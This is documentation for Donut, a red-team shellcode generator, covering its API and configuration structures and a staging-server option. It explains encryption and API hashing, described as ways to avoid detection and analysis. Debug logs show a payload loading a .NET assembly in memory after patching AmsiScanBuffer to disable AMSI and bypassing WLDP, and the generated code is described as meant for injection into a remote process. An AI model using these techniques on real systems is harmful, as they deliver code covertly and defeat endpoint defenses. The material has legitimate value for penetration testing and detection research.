int DonutCreate(PDONUT_CONFIG pConfig)int DonutDelete(PDONUT_CONFIG pConfig)When provided with a valid configuration, DonutCreate will generate a shellcode to execute a VBS/JS/EXE/DLL or XSL files in-memory. If the function returns DONUT_ERROR_SUCCESS, the configuration will contain three components:
The key to decrypt the Module is stored in the Instance so that if a module is discovered on a staging server by an adversary, it should not be possible to decrypt the contents without the instance. DonutDelete will release any memory allocated by a successful call to DonutCreate. The Instance will already be attached to the PIC ready for executing in-memory, but the module may require saving to disk if the PIC will retrieve it from a remote staging server.
A configuration requires a target architecture (only x86 and x86-64 are currently supported), a path to a VBS/JS/EXE/DLL or XML file that will be executed in-memory by the shellcode, a namespace/class for a .NET assembly, including the name of a method to invoke and any parameters passed to the method. If the module will be stored on a staging server, a URL is required, but not a module name because that will be generated randomly.
typedef struct _DONUT_CONFIG { int arch; // target architecture for shellcode char domain[DONUT_MAX_NAME]; // name of domain to create for assembly char cls[DONUT_MAX_NAME]; // name of class and optional namespace char method[DONUT_MAX_NAME]; // name of method to execute char param[(DONUT_MAX_PARAM+1)*DONUT_MAX_NAME]; // string parameters passed to method, separated by comma or semi-colon char file[DONUT_MAX_NAME]; // assembly to create module from char url[DONUT_MAX_URL]; // points to root path of where module will be on remote http server char runtime[DONUT_MAX_NAME]; // runtime version to use. char modname[DONUT_MAX_NAME]; // name of module written to disk int mod_type; // .NET EXE/DLL, VBS,JS,EXE,DLL,XSL uint64_t mod_len; // size of DONUT_MODULE void *mod; // points to donut module int inst_type; // DONUT_INSTANCE_PIC or DONUT_INSTANCE_URL uint64_t inst_len; // size of DONUT_INSTANCE void *inst; // points to donut instance uint64_t pic_len; // size of shellcode void *pic; // points to PIC/shellcode } DONUT_CONFIG, *PDONUT_CONFIG;
| Member | Description |
|---|---|
arch |
Indicates the type of assembly code to generate. DONUT_ARCH_X86 and DONUT_ARCH_X64 are self-explanatory. DONUT_ARCH_X84 indicates dual-mode that combines shellcode for both x86 and amd64. ARM64 will be supported at some point. |
domain |
AppDomain name to create. If one is not specified by the caller, it will be generated randomly. |
cls |
The class name with method to invoke. A namespace is optional. e.g: namespace.class |
method |
The method that will be invoked by the shellcode once a .NET assembly is loaded into memory. This also holds the name of an exported API if the module is an unmanaged DLL. |
param |
Contains a list of parameters for the .NET method or DLL function. Each separated by semi-colon or comma. |
file |
The path of a supported file type: VBS/JS/EXE/DLL or XSL. |
url |
If the type is DONUT_INSTANCE_URL, this should contain the server and path of where module will be stored. e.g: https://www.rogueserver.com/modules/ |
runtime |
The CLR runtime version to use for the .NET assembly. If none is provided, donut will try read from meta header. If that fails, v4.0.30319 is used by default. |
modname |
If the type is DONUT_INSTANCE_URL, this will contain a randomly generated name for the module that should be used when saving the contents of mod to disk. |
mod_type |
Indicates the type of file detected by DonutCreate. For example, DONUT_MODULE_VBS indicates a VBScript file. |
mod_len |
The total size of the Module pointed to by mod. |
mod |
Points to encrypted Module. If the type is DONUT_INSTANCE_URL, this should be saved to file using the modname and accessible via HTTP server. |
inst_type |
DONUT_INSTANCE_PIC indicates a self-contained payload which means the .NET assembly is embedded in executable code. DONUT_INSTANCE_URL indicates the .NET assembly is stored on a remote server with a URL embedded in the instance. |
inst_len |
The total size of the Instance pointed to by inst. |
inst |
Points to an encrypted Instance after a successful call to DonutCreate. Since it's already attached to the pic, this is only provided for debugging purposes. |
pic_len |
The size of data pointed to by pic. |
pic |
Points to executable code for the target architecture which also contains an instance. This should be injected into a remote process. |
Everything that follows here concerns internal workings of Donut and is not required to generate a payload.
The position-independent code will always contain an Instance which can be viewed simply as a configuration for the code itself. It will contain all the data that would normally be stored on the stack or in the .data and .rodata sections of an executable. Once the main code executes, it will decrypt the instance before attempting to resolve the address of API functions. If successful, it will check if an executable file is embedded or must be downloaded from a remote staging server. To verify successful decryption of a module, a randomly generated string stored in the sig field is hashed using Maru and compared with the value of mac.
// everything required for an instance goes into the following structure typedef struct _DONUT_INSTANCE { uint32_t len; // total size of instance DONUT_CRYPT key; // decrypts instance uint64_t iv; // the 64-bit initial value for maru hash union { uint64_t hash[64]; // holds up to 64 api hashes void *addr[64]; // holds up to 64 api addresses // include prototypes only if header included from payload.h #ifdef PAYLOAD_H struct { // imports from kernel32.dll or kernelbase.dll LoadLibraryA_t LoadLibraryA; GetProcAddress_t GetProcAddress; GetModuleHandleA_t GetModuleHandleA; VirtualAlloc_t VirtualAlloc; // required to allocate RW memory for instance VirtualFree_t VirtualFree; VirtualQuery_t VirtualQuery; VirtualProtect_t VirtualProtect; Sleep_t Sleep; MultiByteToWideChar_t MultiByteToWideChar; GetUserDefaultLCID_t GetUserDefaultLCID; // imports from oleaut32.dll SafeArrayCreate_t SafeArrayCreate; SafeArrayCreateVector_t SafeArrayCreateVector; SafeArrayPutElement_t SafeArrayPutElement; SafeArrayDestroy_t SafeArrayDestroy; SafeArrayGetLBound_t SafeArrayGetLBound; SafeArrayGetUBound_t SafeArrayGetUBound; SysAllocString_t SysAllocString; SysFreeString_t SysFreeString; LoadTypeLib_t LoadTypeLib; // imports from wininet.dll InternetCrackUrl_t InternetCrackUrl; InternetOpen_t InternetOpen; InternetConnect_t InternetConnect; InternetSetOption_t InternetSetOption; InternetReadFile_t InternetReadFile; InternetCloseHandle_t InternetCloseHandle; HttpOpenRequest_t HttpOpenRequest; HttpSendRequest_t HttpSendRequest; HttpQueryInfo_t HttpQueryInfo; // imports from mscoree.dll CorBindToRuntime_t CorBindToRuntime; CLRCreateInstance_t CLRCreateInstance; // imports from ole32.dll CoInitializeEx_t CoInitializeEx; CoCreateInstance_t CoCreateInstance; CoUninitialize_t CoUninitialize; }; #endif } api; // everything from here is encrypted int api_cnt; // the 64-bit hashes of API required for instance to work int dll_cnt; // the number of DLL to load before resolving API char dll_name[DONUT_MAX_DLL][32]; // a list of DLL strings to load union { char s[8]; // amsi.dll uint32_t w[2]; } amsi; char clr[8]; // clr.dll char wldp[16]; // wldp.dll char wldpQuery[32]; // WldpQueryDynamicCodeTrust char wldpIsApproved[32]; // WldpIsClassInApprovedList char amsiInit[16]; // AmsiInitialize char amsiScanBuf[16]; // AmsiScanBuffer char amsiScanStr[16]; // AmsiScanString uint16_t wscript[8]; // WScript uint16_t wscript_exe[16]; // wscript.exe GUID xIID_IUnknown; GUID xIID_IDispatch; // GUID required to load .NET assemblies GUID xCLSID_CLRMetaHost; GUID xIID_ICLRMetaHost; GUID xIID_ICLRRuntimeInfo; GUID xCLSID_CorRuntimeHost; GUID xIID_ICorRuntimeHost; GUID xIID_AppDomain; // GUID required to run VBS and JS files GUID xCLSID_ScriptLanguage; // vbs or js GUID xIID_IHost; // wscript object GUID xIID_IActiveScript; // engine GUID xIID_IActiveScriptSite; // implementation GUID xIID_IActiveScriptParse32; // parser GUID xIID_IActiveScriptParse64; // GUID required to run XSL files GUID xCLSID_DOMDocument30; GUID xIID_IXMLDOMDocument; GUID xIID_IXMLDOMNode; int type; // DONUT_INSTANCE_PIC or DONUT_INSTANCE_URL struct { char url[DONUT_MAX_URL]; // staging server hosting donut module char req[8]; // just a buffer for "GET" } http; uint8_t sig[DONUT_MAX_NAME]; // string to hash uint64_t mac; // to verify decryption ok DONUT_CRYPT mod_key; // used to decrypt module uint64_t mod_len; // total size of module union { PDONUT_MODULE p; // for URL DONUT_MODULE x; // for PIC } module; } DONUT_INSTANCE, *PDONUT_INSTANCE;
Modules can be embedded in an Instance or stored on a remote HTTP server.
// everything required for a module goes in the following structure typedef struct _DONUT_MODULE { DWORD type; // EXE, DLL, JS, VBS, XSL WCHAR runtime[DONUT_MAX_NAME]; // runtime version for .NET EXE/DLL WCHAR domain[DONUT_MAX_NAME]; // domain name to use for .NET EXE/DLL WCHAR cls[DONUT_MAX_NAME]; // name of class and optional namespace for .NET EXE/DLL WCHAR method[DONUT_MAX_NAME]; // name of method to invoke for .NET DLL or api for unmanaged DLL DWORD param_cnt; // number of parameters for DLL/EXE WCHAR param[DONUT_MAX_PARAM][DONUT_MAX_NAME]; // string parameters for DLL/EXE CHAR sig[DONUT_MAX_NAME]; // random string to verify decryption ULONG64 mac; // to verify decryption was ok ULONG64 len; // size of EXE/DLL/XSL/JS/VBS file BYTE data[4]; // data of EXE/DLL/XSL/JS/VBS file } DONUT_MODULE, *PDONUT_MODULE;
A hash function called Maru is used to resolve the address of API at runtime. It uses a Davies-Meyer construction and the SPECK block cipher to derive a 64-bit hash from an API string. The padding is similar to what's used by MD4 and MD5 except only 32-bits of the string length are stored in the buffer instead of 64-bits. An initial value (IV) chosen randomly ensures the 64-bit API hashes are unique for each instance and cannot be used for detection of Donut. Future releases will likely support alternative methods of resolving address of API to decrease chance of detection.
The following structure is used to hold a master key, counter and nonce for Donut, which are generated randomly.
typedef struct _DONUT_CRYPT { BYTE mk[DONUT_KEY_LEN]; // master key BYTE ctr[DONUT_BLK_LEN]; // counter + nonce } DONUT_CRYPT, *PDONUT_CRYPT;
Chaskey, a 128-bit block cipher with support for 128-bit keys, is used in Counter (CTR) mode to decrypt a Module or an Instance at runtime. If an adversary discovers a staging server, it should not be feasible for them to decrypt a donut module without the key which is stored in the donut payload.
The payload is capable of displaying detailed information about each step executing a file in-memory and can be useful in tracking down bugs. To build a debug-enabled executable, specify the debug label with nmake/make for both donut.c and payload.c.
nmake debug -f Makefile.msvc make debug -f Makefile.mingw
Use donut to create a payload as you normally would and a file called instance will be saved to disk.
c:\hub\donut>donut -fClass1.dll -cTestClass -mRunProcess -pcalc.exe,notepad.exe [ Donut shellcode generator v0.9.2 [ Copyright (c) 2019 TheWover, Odzhan DEBUG: donut.c:822:DonutCreate(): Entering. DEBUG: donut.c:824:DonutCreate(): Validating configuration and path of file DEBUG: donut.c:840:DonutCreate(): Validating instance type DEBUG: donut.c:880:DonutCreate(): Validating architecture DEBUG: donut.c:277:get_file_info(): Entering. DEBUG: donut.c:286:get_file_info(): Checking extension of Class1.dll DEBUG: donut.c:293:get_file_info(): Extension is ".dll" DEBUG: donut.c:320:get_file_info(): Module is DLL DEBUG: donut.c:327:get_file_info(): Mapping Class1.dll into memory DEBUG: donut.c:222:map_file(): Reading size of file : Class1.dll DEBUG: donut.c:231:map_file(): Opening Class1.dll DEBUG: donut.c:241:map_file(): Mapping 3072 bytes for Class1.dll DEBUG: donut.c:336:get_file_info(): Checking DOS header DEBUG: donut.c:342:get_file_info(): Checking NT header DEBUG: donut.c:348:get_file_info(): Checking IMAGE_DATA_DIRECTORY DEBUG: donut.c:356:get_file_info(): Checking characteristics DEBUG: donut.c:368:get_file_info(): COM Directory found DEBUG: donut.c:384:get_file_info(): Runtime version : v4.0.30319 DEBUG: donut.c:395:get_file_info(): Leaving. DEBUG: donut.c:944:DonutCreate(): Creating module DEBUG: donut.c:516:CreateModule(): Entering. DEBUG: donut.c:520:CreateModule(): Allocating 9504 bytes of memory for DONUT_MODULE DEBUG: donut.c:544:CreateModule(): Domain : TPYTXT7T DEBUG: donut.c:549:CreateModule(): Class : TestClass DEBUG: donut.c:552:CreateModule(): Method : RunProcess DEBUG: donut.c:559:CreateModule(): Runtime : v4.0.30319 DEBUG: donut.c:584:CreateModule(): Adding "calc.exe" DEBUG: donut.c:584:CreateModule(): Adding "notepad.exe" DEBUG: donut.c:610:CreateModule(): Leaving. DEBUG: donut.c:951:DonutCreate(): Creating instance DEBUG: donut.c:621:CreateInstance(): Entering. DEBUG: donut.c:624:CreateInstance(): Allocating space for instance DEBUG: donut.c:631:CreateInstance(): The size of module is 9504 bytes. Adding to size of instance. DEBUG: donut.c:643:CreateInstance(): Generating random key for instance DEBUG: donut.c:649:CreateInstance(): Generating random key for module DEBUG: donut.c:655:CreateInstance(): Generating random string to verify decryption DEBUG: donut.c:661:CreateInstance(): Generating random IV for Maru hash DEBUG: donut.c:666:CreateInstance(): Generating hashes for API using IV: 59e4ea34bad26f10 DEBUG: donut.c:679:CreateInstance(): Hash for kernel32.dll : LoadLibraryA = 710C9DA8846AE821 DEBUG: donut.c:679:CreateInstance(): Hash for kernel32.dll : GetProcAddress = 2334B1630D3B9C85 DEBUG: donut.c:679:CreateInstance(): Hash for kernel32.dll : GetModuleHandleA = 5389E01382E0391 DEBUG: donut.c:679:CreateInstance(): Hash for kernel32.dll : VirtualAlloc = 51EE6B0DB215095E DEBUG: donut.c:679:CreateInstance(): Hash for kernel32.dll : VirtualFree = F55A2169F30A6ED4 DEBUG: donut.c:679:CreateInstance(): Hash for kernel32.dll : VirtualQuery = 22DB7628044F6E32 DEBUG: donut.c:679:CreateInstance(): Hash for kernel32.dll : VirtualProtect = 688AA07FEF250016 DEBUG: donut.c:679:CreateInstance(): Hash for kernel32.dll : Sleep = 5BF1C1B408CCA4A5 DEBUG: donut.c:679:CreateInstance(): Hash for kernel32.dll : MultiByteToWideChar = 438AD242BBBC755 DEBUG: donut.c:679:CreateInstance(): Hash for kernel32.dll : GetUserDefaultLCID = 33ED1B2C1A2F9EC7 DEBUG: donut.c:679:CreateInstance(): Hash for oleaut32.dll : SafeArrayCreate = 78AD2BFB55A5E7ED DEBUG: donut.c:679:CreateInstance(): Hash for oleaut32.dll : SafeArrayCreateVector = 539F6582DE26F7BC DEBUG: donut.c:679:CreateInstance(): Hash for oleaut32.dll : SafeArrayPutElement = 5057AD641F749DA0 DEBUG: donut.c:679:CreateInstance(): Hash for oleaut32.dll : SafeArrayDestroy = A63C510FF032080E DEBUG: donut.c:679:CreateInstance(): Hash for oleaut32.dll : SafeArrayGetLBound = A37979CE2EEDDA6 DEBUG: donut.c:679:CreateInstance(): Hash for oleaut32.dll : SafeArrayGetUBound = 64A9C62452B8653C DEBUG: donut.c:679:CreateInstance(): Hash for oleaut32.dll : SysAllocString = BFEEAAB6CE6017FB DEBUG: donut.c:679:CreateInstance(): Hash for oleaut32.dll : SysFreeString = E6FD34B03A2701F6 DEBUG: donut.c:679:CreateInstance(): Hash for oleaut32.dll : LoadTypeLib = 2A33214873ADC58C DEBUG: donut.c:679:CreateInstance(): Hash for wininet.dll : InternetCrackUrlA = 1ADE3553184C68E1 DEBUG: donut.c:679:CreateInstance(): Hash for wininet.dll : InternetOpenA = 1DEDE3D32F2FCD3 DEBUG: donut.c:679:CreateInstance(): Hash for wininet.dll : InternetConnectA = 781FD6B18C99CAD2 DEBUG: donut.c:679:CreateInstance(): Hash for wininet.dll : InternetSetOptionA = 13EC8A292778FC3F DEBUG: donut.c:679:CreateInstance(): Hash for wininet.dll : InternetReadFile = 8D16E60E7C2E582A DEBUG: donut.c:679:CreateInstance(): Hash for wininet.dll : InternetCloseHandle = C28E8A3AABB2A755 DEBUG: donut.c:679:CreateInstance(): Hash for wininet.dll : HttpOpenRequestA = 6C5189610A8545F5 DEBUG: donut.c:679:CreateInstance(): Hash for wininet.dll : HttpSendRequestA = 4DFA0D985988D31 DEBUG: donut.c:679:CreateInstance(): Hash for wininet.dll : HttpQueryInfoA = ED09A37256B27F04 DEBUG: donut.c:679:CreateInstance(): Hash for mscoree.dll : CorBindToRuntime = FD669FABED4C6B7 DEBUG: donut.c:679:CreateInstance(): Hash for mscoree.dll : CLRCreateInstance = 56B7AC5C110570B5 DEBUG: donut.c:679:CreateInstance(): Hash for ole32.dll : CoInitializeEx = 3733F4734D12D7C DEBUG: donut.c:679:CreateInstance(): Hash for ole32.dll : CoCreateInstance = FCB3EAC51E43319B DEBUG: donut.c:679:CreateInstance(): Hash for ole32.dll : CoUninitialize = 908A347B45C6E4A2 DEBUG: donut.c:694:CreateInstance(): Copying GUID structures and DLL strings for loading .NET assemblies DEBUG: donut.c:791:CreateInstance(): Copying module data to instance DEBUG: donut.c:796:CreateInstance(): encrypting instance DEBUG: donut.c:808:CreateInstance(): Leaving. DEBUG: donut.c:959:DonutCreate(): Saving instance to file DEBUG: donut.c:992:DonutCreate(): PIC size : 33050 DEBUG: donut.c:999:DonutCreate(): Inserting opcodes DEBUG: donut.c:1035:DonutCreate(): Copying 15218 bytes of x86 + amd64 shellcode DEBUG: donut.c:259:unmap_file(): Unmapping DEBUG: donut.c:262:unmap_file(): Closing DEBUG: donut.c:1061:DonutCreate(): Leaving. [ Instance type : PIC [ Module file : "Class1.dll" [ File type : .NET DLL [ Class : TestClass [ Method : RunProcess [ Parameters : calc.exe,notepad.exe [ Target CPU : x86+AMD64 [ Shellcode : "payload.bin" DEBUG: donut.c:1069:DonutDelete(): Entering. DEBUG: donut.c:1088:DonutDelete(): Leaving.
Pass the instance as a parameter to payload.exe and it will run on the host system as if in a target environment.
c:\hub\donut\payload>payload ..\instance
Running...
DEBUG: payload.c:45:ThreadProc(): Maru IV : 1899033E0863343E
DEBUG: payload.c:48:ThreadProc(): Resolving address for VirtualAlloc() : 9280348A6A2AFA7
DEBUG: payload.c:52:ThreadProc(): Resolving address for VirtualAlloc() : 3A49032E4107D985
DEBUG: payload.c:61:ThreadProc(): VirtualAlloc : 77535ED0 VirtualFree : 77535EF0
DEBUG: payload.c:63:ThreadProc(): Allocating 17800 bytes of RW memory
DEBUG: payload.c:70:ThreadProc(): Copying 17800 bytes of data to memory 008D0000
DEBUG: payload.c:74:ThreadProc(): Zero initializing PDONUT_ASSEMBLY
DEBUG: payload.c:82:ThreadProc(): Decrypting 17800 bytes of instance
DEBUG: payload.c:89:ThreadProc(): Generating hash to verify decryption
DEBUG: payload.c:91:ThreadProc(): Instance : c16c69caa83fb13f | Result : c16c69caa83fb13f
DEBUG: payload.c:98:ThreadProc(): Resolving LoadLibraryA
DEBUG: payload.c:104:ThreadProc(): Loading ole32.dll ...
DEBUG: payload.c:104:ThreadProc(): Loading oleaut32.dll ...
DEBUG: payload.c:104:ThreadProc(): Loading wininet.dll ...
DEBUG: payload.c:104:ThreadProc(): Loading mscoree.dll ...
DEBUG: payload.c:108:ThreadProc(): Resolving 33 API
DEBUG: payload.c:111:ThreadProc(): Resolving API address for 066A0ED9815D3C92
DEBUG: payload.c:111:ThreadProc(): Resolving API address for F3569749C64E1DA5
DEBUG: payload.c:111:ThreadProc(): Resolving API address for 09280348A6A2AFA7
DEBUG: payload.c:111:ThreadProc(): Resolving API address for 3A49032E4107D985
DEBUG: payload.c:111:ThreadProc(): Resolving API address for FDE50FEB629EB834
DEBUG: payload.c:111:ThreadProc(): Resolving API address for 4A4C764EFA89A84F
DEBUG: payload.c:111:ThreadProc(): Resolving API address for 5D388BA18E017E53
DEBUG: payload.c:111:ThreadProc(): Resolving API address for 4EA2B25D8FAABD2B
DEBUG: payload.c:111:ThreadProc(): Resolving API address for F1D278132E49F050
DEBUG: payload.c:111:ThreadProc(): Resolving API address for D05386A0F8FF7CAD
DEBUG: payload.c:111:ThreadProc(): Resolving API address for 8121B63764A390A6
DEBUG: payload.c:111:ThreadProc(): Resolving API address for EB2BFAA408124470
DEBUG: payload.c:111:ThreadProc(): Resolving API address for 11B666F77E7303F6
DEBUG: payload.c:111:ThreadProc(): Resolving API address for E8BD6B7A99981E38
DEBUG: payload.c:111:ThreadProc(): Resolving API address for DE78E211DE61998B
DEBUG: payload.c:111:ThreadProc(): Resolving API address for 09D967C5479A0F9F
DEBUG: payload.c:111:ThreadProc(): Resolving API address for 6CA1D167C2BFFA9A
DEBUG: payload.c:111:ThreadProc(): Resolving API address for AD11F6324A205C5E
DEBUG: payload.c:111:ThreadProc(): Resolving API address for 5EAEF345362A2811
DEBUG: payload.c:111:ThreadProc(): Resolving API address for A0CC0DC36E8EDD2C
DEBUG: payload.c:111:ThreadProc(): Resolving API address for A4241EDCC8B14F85
DEBUG: payload.c:111:ThreadProc(): Resolving API address for 756CEB8FF481A72E
DEBUG: payload.c:111:ThreadProc(): Resolving API address for 8116A255193A09CA
DEBUG: payload.c:111:ThreadProc(): Resolving API address for AB14A786531404A1
DEBUG: payload.c:111:ThreadProc(): Resolving API address for 1CF4A93D6896380A
DEBUG: payload.c:111:ThreadProc(): Resolving API address for 61B393CC2DE33733
DEBUG: payload.c:111:ThreadProc(): Resolving API address for ADAF62D44179684A
DEBUG: payload.c:111:ThreadProc(): Resolving API address for 7F9591B7380CD749
DEBUG: payload.c:111:ThreadProc(): Resolving API address for 3CC76B29D676544F
DEBUG: payload.c:111:ThreadProc(): Resolving API address for 725AA978FD2B1255
DEBUG: peb.c:87:FindExport(): 725aa978fd2b1255 is forwarded to api-ms-win-core-com-l1-1-0.CoInitializeEx
DEBUG: peb.c:110:FindExport(): Trying to load api-ms-win-core-com-l1-1-0.dll
DEBUG: peb.c:114:FindExport(): Calling GetProcAddress(CoInitializeEx)
DEBUG: payload.c:111:ThreadProc(): Resolving API address for 6C0F670F3C85A407
DEBUG: peb.c:87:FindExport(): 6c0f670f3c85a407 is forwarded to api-ms-win-core-com-l1-1-0.CoCreateInstance
DEBUG: peb.c:110:FindExport(): Trying to load api-ms-win-core-com-l1-1-0.dll
DEBUG: peb.c:114:FindExport(): Calling GetProcAddress(CoCreateInstance)
DEBUG: payload.c:111:ThreadProc(): Resolving API address for 2996694CA69B44E8
DEBUG: peb.c:87:FindExport(): 2996694ca69b44e8 is forwarded to api-ms-win-core-com-l1-1-0.CoUninitialize
DEBUG: peb.c:110:FindExport(): Trying to load api-ms-win-core-com-l1-1-0.dll
DEBUG: peb.c:114:FindExport(): Calling GetProcAddress(CoUninitialize)
DEBUG: payload.c:127:ThreadProc(): Using module embedded in instance
DEBUG: inmem_dotnet.c:43:LoadAssembly(): Using module embedded in instance
DEBUG: inmem_dotnet.c:51:LoadAssembly(): CLRCreateInstance
DEBUG: inmem_dotnet.c:59:LoadAssembly(): ICLRMetaHost::GetRuntime("v4.0.30319")
DEBUG: inmem_dotnet.c:66:LoadAssembly(): ICLRRuntimeInfo::IsLoadable
DEBUG: inmem_dotnet.c:70:LoadAssembly(): ICLRRuntimeInfo::GetInterface
DEBUG: inmem_dotnet.c:78:LoadAssembly(): HRESULT: 00000000
DEBUG: inmem_dotnet.c:100:LoadAssembly(): ICorRuntimeHost::Start
DEBUG: inmem_dotnet.c:107:LoadAssembly(): ICorRuntimeHost::CreateDomain("TP7WFT9M")
DEBUG: inmem_dotnet.c:115:LoadAssembly(): IUnknown::QueryInterface
DEBUG: bypass.c:83:DisableAMSI(): Length of AmsiScanBuffer stub is 32 bytes.
DEBUG: bypass.c:89:DisableAMSI(): Overwriting AmsiScanBuffer
DEBUG: bypass.c:104:DisableAMSI(): Length of AmsiScanString stub is -16 bytes.
DEBUG: inmem_dotnet.c:123:LoadAssembly(): DisableAMSI OK
DEBUG: inmem_dotnet.c:127:LoadAssembly(): DisableWLDP OK
DEBUG: inmem_dotnet.c:134:LoadAssembly(): Copying 3072 bytes of assembly to safe array
DEBUG: inmem_dotnet.c:140:LoadAssembly(): AppDomain::Load_3
DEBUG: inmem_dotnet.c:147:LoadAssembly(): HRESULT : 00000000
DEBUG: inmem_dotnet.c:149:LoadAssembly(): Erasing assembly from memory
DEBUG: inmem_dotnet.c:155:LoadAssembly(): SafeArrayDestroy
DEBUG: inmem_dotnet.c:176:RunAssembly(): Using module embedded in instance
DEBUG: inmem_dotnet.c:184:RunAssembly(): Type is DLL
DEBUG: inmem_dotnet.c:255:RunAssembly(): SysAllocString("TestClass")
DEBUG: inmem_dotnet.c:259:RunAssembly(): SysAllocString("RunProcess")
DEBUG: inmem_dotnet.c:263:RunAssembly(): Assembly::GetType_2
DEBUG: inmem_dotnet.c:269:RunAssembly(): SafeArrayCreateVector(2 parameter(s))
DEBUG: inmem_dotnet.c:276:RunAssembly(): Adding "calc.exe" as parameter 1
DEBUG: inmem_dotnet.c:276:RunAssembly(): Adding "notepad.exe" as parameter 2
DEBUG: inmem_dotnet.c:292:RunAssembly(): Calling Type::InvokeMember_3
DEBUG: inmem_dotnet.c:306:RunAssembly(): Type::InvokeMember_3 : 00000000 : Success
DEBUG: inmem_dotnet.c:323:FreeAssembly(): Type::Release
DEBUG: inmem_dotnet.c:335:FreeAssembly(): Assembly::Release
DEBUG: inmem_dotnet.c:341:FreeAssembly(): AppDomain::Release
DEBUG: inmem_dotnet.c:347:FreeAssembly(): IUnknown::Release
DEBUG: inmem_dotnet.c:353:FreeAssembly(): ICorRuntimeHost::Stop
DEBUG: inmem_dotnet.c:356:FreeAssembly(): ICorRuntimeHost::Release
DEBUG: inmem_dotnet.c:362:FreeAssembly(): ICLRRuntimeInfo::Release
DEBUG: inmem_dotnet.c:368:FreeAssembly(): ICLRMetaHost::Release
DEBUG: payload.c:171:ThreadProc(): Erasing RW memory for instance
DEBUG: payload.c:174:ThreadProc(): Releasing RW memory for instance
Obviously you should be cautious with what files you decide to execute on your machine.